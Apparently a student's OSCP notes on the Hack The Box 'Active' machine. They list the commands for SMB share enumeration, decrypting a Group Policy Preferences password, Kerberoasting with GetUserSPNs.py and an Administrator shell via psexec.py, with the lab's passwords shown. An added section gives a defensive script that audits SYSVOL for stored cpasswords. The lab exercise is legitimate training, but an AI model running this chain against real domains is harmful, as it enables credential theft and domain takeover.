OSCP Notes

HTB Write-up Active (Windows) - Active Directory

What I learned today:
Nmap Scan Result:
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-02-11 03:58:43Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-02-11T03:59:42
|_ start_date: 2022-02-11T03:56:29
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
All port scans
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5722/tcp open msdfsr
9389/tcp open adws
49152/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49169/tcp open unknown
49173/tcp open unknown
49174/tcp open unknown
Tried kerbrute: no luck on other usernames so far.
SMB enum:
I got some shares. Let's do more SMB enum.
enum4linux is outdated and didn't give me much useful info.
For SMB enum, use smbmap:
smbmap -H 10.129.138.208
It shows what permissions we have.
To find out the actual host name, do some nslookup (see "Find the host name" below).
It shows that we have read access on Replication! TIP: smbclient -L lists the shares, but to connect use smbclient //IP/SHARE
Now we have access to the Replication share.

Find the host name

Nslookup
1. Set the server name as the target IP.
2. Ask who 127.0.0.1 is.
3. If that doesn't show anything, ask who TARGET_IP is (in this case, it times out).
dnsrecon to scan the entire subnet:
NEW: dnsrecon -d 10.129.138.208 -r 10.129.138.208/8 --depth 10
It didn't work well this time.
Search through the directories in the Replication share with:
smbmap -H 10.129.138.208 -R Replication --depth 10
Found a group policy file: Groups.xml
Download the file with:
smbmap -H 10.129.138.208 -R Replication -A Groups.xml -q --depth 10
-q quiet
-A downloads the matching file if it is available.
It saves the file to 10.129.138.208-Replication_active.htb_Policies...
The group policy password in Groups.xml is encrypted.
Decrypted it via:
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
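Defender's counterpart to the step above, added here and not part of the original notes: a GPP cpassword is recoverable because the AES key was published by Microsoft (MS14-025), so the remediation is to locate every Group Policy Preferences item that still carries one and remove it. This script audits an offline copy of a SYSVOL/Replication tree and reports such items without decrypting anything; the directory layout, policy GUIDs and XML contents are constructed samples.

```python
"""Audit a SYSVOL/Replication export for GPP items still carrying cpassword."""
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP XML files whose Properties element may carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

# Constructed sample Groups.xml: real shape, placeholder ciphertext.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_CIPHERTEXT" userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""
# Constructed sample where the stored credential was already cleared.
SAMPLE_CLEARED_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="localadmin">
    <Properties action="U" cpassword="" userName="localadmin"/>
  </User>
</Groups>
"""


def find_cpasswords(root_dir):
    """Return [(relative path, account, exposed)] for every GPP item with a
    cpassword attribute; exposed is False when the value is empty (cleared)."""
    root = Path(root_dir)
    findings = []
    for path in sorted(root.rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue  # malformed file: skip rather than abort the whole audit
        for props in tree.iter("Properties"):
            if "cpassword" not in props.attrib:
                continue
            account = props.get("userName") or props.get("accountName") or "<unknown>"
            findings.append((str(path.relative_to(root)), account, props.get("cpassword") != ""))
    return findings


def build_sample_share():
    """Write the constructed samples into a SYSVOL-like tree (hypothetical GUIDs)."""
    base = Path(tempfile.mkdtemp())
    for guid, content in (("{POLICY-GUID-1}", SAMPLE_GROUPS_XML), ("{POLICY-GUID-2}", SAMPLE_CLEARED_XML)):
        d = base / "Policies" / guid / "MACHINE" / "Preferences" / "Groups"
        d.mkdir(parents=True)
        (d / "Groups.xml").write_text(content, encoding="utf-8")
    return base


if __name__ == "__main__":
    for rel, account, exposed in find_cpasswords(build_sample_share()):
        print(f"{'EXPOSED' if exposed else 'cleared'}  {account:22} {rel}")
```

Point it at a mounted or copied SYSVOL and every EXPOSED line is a policy item whose password must be removed and rotated.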
Now that we have a password, let's check what it can reach:
smbmap -d active.htb -u svc_tgs -p GPPstillStandingStrong2k18 -H 10.129.138.208
Used GetUserSPNs.py to request service tickets and dump the hashes:
GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.129.138.208 -request
Crack it with hashcat.
The password for Administrator is Ticketmaster1968.
Now that we have the password, let's use psexec.py to escalate privileges:
psexec.py active.htb/Administrator:Ticketmaster1968@10.129.138.208
We are in the system!